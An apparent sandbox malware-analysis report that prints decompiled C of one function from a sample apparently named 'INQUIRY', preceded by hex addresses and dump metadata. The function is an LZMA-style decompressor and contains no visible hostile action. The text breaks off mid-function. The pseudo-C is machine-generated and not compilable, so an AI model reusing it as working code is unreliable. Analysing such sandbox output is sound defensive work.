0x00000000
0x0040619e
0x0040619e
0x004061a2
0x00406862
0x00000000
0x00406862
0x004061a8
0x004061ab
0x004061ae
0x004061b2
0x004061b5
0x004061bb
0x004061bd
0x004061bd
0x004061bd
0x004061c0
0x004061c3
0x004061c3
0x004061c3
0x004061c9
0x00000000
0x00000000
0x004061cb
0x004061ce
0x004061d1
0x004061d4
0x004061d7
0x004061da
0x004061dd
0x004061e0
0x004061e3
0x004061e6
0x004061e9
0x00406201
0x00406204
0x00406207
0x0040620a
0x0040620a
0x0040620d
0x00406211
0x00406213
0x004061eb
0x004061eb
0x004061f3
0x004061f8
0x004061fa
0x004061fc
0x004061fc
0x00406216
0x0040621d
0x00406220
0x00000000
0x00406222
0x00000000
0x00406222
0x00406220
0x00406227
0x00406227
0x00406227
0x00406227
0x00000000
0x00000000
0x00406262
0x00406262
0x00406266
0x0040686e
0x00000000
0x0040686e
0x0040626c
0x0040626f
0x00406272
0x00406276
0x00406279
0x0040627f
0x00406281
0x00406281
0x00406281
0x00406284
0x00406287
0x00406287
0x0040628d
0x0040622b
0x0040622b
0x0040622e
0x00000000
0x0040622e
0x0040628f
0x0040628f
0x00406292
0x00406295
0x00406298
0x0040629b
0x0040629e
0x004062a1
0x004062a4
0x004062a7
0x004062aa
0x004062ad
0x004062c5
0x004062c8
0x004062cb
0x004062ce
0x004062ce
0x004062d1
0x004062d5
0x004062d7
0x004062af
0x004062af
0x004062b7
0x004062bc
0x004062be
0x004062c0
0x004062c0
0x004062da
0x004062e1
0x004062e4
0x00000000
0x004062e6
0x00000000
0x004062e6
0x00000000
0x00406573
0x00406573
0x00406577
0x0040689e
0x00000000
0x0040689e
0x0040657d
0x00406580
0x00406583
0x00406587
0x0040658a
0x00406590
0x00406592
0x00406592
0x00406592
0x00406595
0x00000000
0x00000000
0x00000000
0x00000000
0x00406682
0x00406686
0x004066a8
0x004066ab
0x004066b5
0x00000000
0x004066b5
0x00406688
0x0040668b
0x0040668f
0x00406692
0x00406692
0x00406695
0x00000000
0x00000000
0x0040673f
0x00406743
0x00406761
0x00406761
0x00406761
0x00406768
0x0040676f
0x00406776
0x00406776
0x00000000
0x00406776
0x00406745
0x00406748
0x0040674b
0x0040674e
0x00406755
0x00406699
0x00406699
0x0040669c
0x00000000
0x00000000
0x00406830
0x00406833
0x00000000
0x00000000
0x0040646a
0x0040646c
0x00406473
0x00406474
0x00406476
0x00406479
0x00000000
0x00000000
0x00406481
0x00406484
0x00406487
0x00406489
0x0040648b
0x0040648b
0x0040648c
0x0040648f
0x00406496
0x00406499
0x004064a7
0x00000000
0x00000000
0x0040677d
0x0040677d
0x00406780
0x00406787
0x00000000
0x00000000
0x0040678c
0x0040678c
0x00406790
0x004068c8
0x00000000
0x004068c8
0x00406796
0x00406799
0x0040679c
0x004067a0
0x004067a3
0x004067a9
0x004067ab
0x004067ab
0x004067ab
0x004067ae
0x004067b1
0x004067b1
0x004067b1
0x004067b1
0x004067b4
0x004067b4
0x004067b8
0x00406818
0x0040681b
0x00406820
0x00406821
0x00406823
0x00406825
0x00406828
0x00000000
0x00406828
0x004067ba
0x004067c0
0x004067c3
0x004067c6
0x004067c9
0x004067cc
0x004067cf
0x004067d2
0x004067d5
0x004067d8
0x004067db
0x004067f4
0x004067f7
0x004067fa
0x004067fd
0x00406801
0x00406803
0x00406803
0x00406804
0x00406807
0x004067dd
0x004067dd
0x004067e5
0x004067ea
0x004067ec
0x004067ef
0x004067ef
0x0040680a
0x00406811
0x00000000
0x00406813
0x00000000
0x00406813
0x00000000
0x004064af
0x004064b2
0x004064e8
0x00406618
0x00406618
0x00406618
0x00406618
0x0040661b
0x0040661b
0x0040661e
0x00406620
0x004068aa
0x00000000
0x004068aa
0x00406626
0x00406629
0x00000000
0x00000000
0x0040662f
0x00406633
0x00406636
0x00406636
0x00406636
0x00000000
0x00406636
0x004064b4
0x004064b6
0x004064b8
0x004064ba
0x004064bd
0x004064be
0x004064c0
0x004064c2
0x004064c5
0x004064c8
0x004064de
0x004064e3
0x0040651b
0x0040651b
0x0040651f
0x0040654b
0x0040654d
0x00406554
0x00406557
0x0040655a
0x0040655a
0x0040655f
0x0040655f
0x00406561
0x00406564
0x0040656b
0x0040656e
0x0040659b
0x0040659b
0x0040659e
0x004065a1
0x00406615
0x00406615
0x00406615
0x00000000
0x00406615
0x004065a3
0x004065a9
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b8
0x004065bb
0x004065be
0x004065c1
0x004065c4
0x004065dd
0x004065df
0x004065e2
0x004065e3
0x004065e6
0x004065e8
0x004065eb
0x004065ed
0x004065ef
0x004065f2
0x004065f4
0x004065f7
0x004065fb
0x004065fd
0x004065fd
0x004065fe
0x00406601
0x00406604
0x004065c6
0x004065c6
0x004065ce
0x004065d3
0x004065d5
0x004065d8
0x004065d8
0x00406607
0x0040660e
0x00406598
0x00406598
0x00406598
0x00406598
0x00000000
0x00406610
0x00000000
0x00406610
0x0040660e
0x00406521
0x00406524
0x00406526
0x00406529
0x0040652c
0x0040652f
0x00406531
0x00406534
0x00406537
0x00406537
0x0040653a
0x0040653a
0x0040653d
0x00406544
0x00406518
0x00406518
0x00406518
0x00406518
0x00000000
0x00406546
0x00000000
0x00406546
0x00406544
0x004064ca
0x004064cd
0x004064cf
0x004064d2
0x00000000
0x00000000
0x00406231
0x00406231
0x00406235
0x0040687a
0x00000000
0x0040687a
0x0040623b
0x0040623e
0x00406241
0x00406244
0x00406247
0x0040624a
0x0040624d
0x0040624f
0x00406252
0x00406255
0x00406258
0x0040625a
0x0040625a
0x0040625a
0x00000000
0x00000000
0x00000000
0x00000000
0x00406639
0x00406639
0x00406639
0x0040663d
0x00000000
0x00000000
0x00406643
0x00406646
0x00406649
0x0040664c
0x0040664e
0x0040664e
0x0040664e
0x00406651
0x00406654
0x00406657
0x0040665a
0x0040665d
0x00406660
0x00406661
0x00406663
0x00406663
0x00406663
0x00406666
0x00406669
0x0040666c
0x0040666f
0x00406672
0x00406676
0x00406678
0x0040667b
0x00000000
0x0040667d
0x00000000
0x0040667d
0x0040667b
0x004068b0
0x00000000
0x00000000
0x00405edf

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15aa086d42ea43156f7fbf6fbf97274f99b2efc4d47cfe7aa8cc3aef762d7e26
Instruction ID: 22847fb14cdf7a24f95a3c84300c4786f150dfac54d3f328c430af40b2e48c23
Opcode Fuzzy Hash: 15aa086d42ea43156f7fbf6fbf97274f99b2efc4d47cfe7aa8cc3aef762d7e26
Instruction Fuzzy Hash: EB816871D04229CFDF24CFA8C844BAEBBB1FB44305F25816AD406BB281C7789A86DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00405E9D Relevance: 5.2, APIs: 4, Instructions: 198
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00405E9D(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M004068EF))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
